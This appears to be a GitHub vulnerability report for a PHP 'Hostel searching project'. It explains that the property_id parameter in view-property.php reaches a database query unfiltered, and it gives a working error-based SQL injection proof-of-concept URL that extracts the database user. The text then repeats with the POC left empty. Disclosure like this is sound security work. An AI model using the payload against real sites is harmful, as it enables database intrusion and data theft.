SQL injection vulnerability exists in Hostel searching project
1.Build environment
Aapche2.4.39; MySQL5.7.26; PHP8.0.2
2.Vulnerability analysis
view-property.php:
property_ ID is assigned to $property_ The ID variable is then brought into the database for query, and the query result is returned. During this process, the property_ The ID is brought into the database without being filtered, thus creating a SQL injection vulnerability
We can use sqlmap to validate
Manual SQL injection proof
3.POC
http://127.0.0.1/view-property.php?property_id=127' or (select 1 from(select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'ace'='ace
The text was updated successfully, but these errors were encountered:
SQL injection vulnerability exists in Hostel searching project
1.Build environment
Aapche2.4.39; MySQL5.7.26; PHP8.0.2
2.Vulnerability analysis
view-property.php:
property_ ID is assigned to $property_ The ID variable is then brought into the database for query, and the query result is returned. During this process, the property_ The ID is brought into the database without being filtered, thus creating a SQL injection vulnerability
3.POC
The text was updated successfully, but these errors were encountered: